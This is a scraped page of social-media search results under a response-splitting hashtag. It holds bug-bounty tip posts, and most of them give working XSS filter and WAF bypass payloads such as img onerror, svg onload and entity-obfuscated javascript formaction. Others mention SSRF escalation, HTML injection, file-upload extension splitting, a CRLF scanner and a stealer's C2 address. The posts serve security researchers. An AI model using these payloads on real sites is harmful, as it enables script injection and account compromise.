#securecodingagainsthttpresponsesplitting search results

No results for "#securecodingagainsthttpresponsesplitting"

How do we turn bad SSRF (blind) into good SSRF (full response)? The @assetnote Security Research team at @SLCyberSec used a novel technique involving HTTP redirect loops and incremental status codes that leaked the full HTTP resp. It may work elsewhere! slcyber.io/assetnote-secu…

Bug Bounty Tip :: HTML Injection - Information Disclosure Hijack information from a page using <img> tag with unclosed "src" attr #CyberSecurity #cybersecuritytips #Hacking #BugBounty #bugbountytip #infosec #hacker #togetherwehitharder #bugcrowd #hack #hackers #hackerone

Old Cloudflare XSS bypass but still works.

<img alt="<x" title="/><img src=x onerror=alert(6)>">

Bug Bounty Tip

Always check different encodings for your XSS payload.

For example:
?q=<img src onerror=alert(1)>
?q=\u003cimg src onerror=alert(1)\u003e

There might be a filter that removes <>, but not unicode symbols \u003c \u003e.

Cheers!

Bug Bounty Hint ⚔️🛡️ File Upload Extension Splitting Cheat Sheet: #infosecurity #cybersecurite #bugbountytips

Don't trust the Host header in HTTP, firstly - check DNS 🧐 Here #ACRStealer mimics @Bitdefender (indicates the official website in this POST request, but the real IP is different) 🦎 C2: 87.120.219[.]223 tria.ge/251014-qd8j9aa… virustotal.com/gui/file/83b63… #stealer

XSS: Arithmetic Operators & Optional Chaining To Bypass Filters & Sanitization secjuice.com/xss-arithmetic… #infosec #XSS #cybersec #bugbountytips

XSS filter bypass using stripped </div> tags to obfuscate. Multiple P2 Stored XSS on a private bug bounty program. XSS Payload: <</div>script</div>>alert()<</div>/script</div>> #BugBountyTips #bugbounty #xss @brutelogic

How to use encodings in <a>. What symbols in which points you can inject to bypass WAF, filters, sanitizers. ⚔️ gist.github.com/0xSojalSec/461… #infosec #CyberSecurity #bugbountytips

My new XSS Bypass Filter! "/><svg+svg+svg\/\/On+OnLoAd=confirm(1)> Please let me know if some researcher found this before me in the comments! Thank you :) And happy hacking! #bugbounty #bugbountytips #0day #exploit #xss #hacking #hackers #bugs

A Bird’s Eye View of Defense-in-Depth Structure of Cybersecurity

CRLFsuite The most powerful CRLF injection (HTTP Response Splitting) scanner. github.com/Raghavd3v/CRLF… #cybersecurity #infosec #pentesting #bugbounty

XSS on a login page while stuck in an input tag with <> filtered. Final Payload: " formaction=java%26Tab%3bscript:ale%26Tab%3brt() type=image src="" Also gets around "javascript" and "alert" blacklist with html entity Tab obfuscation. #BugBountyTips #bugbounty #XSS

Defense-in-Depth Structure of Cybersecurity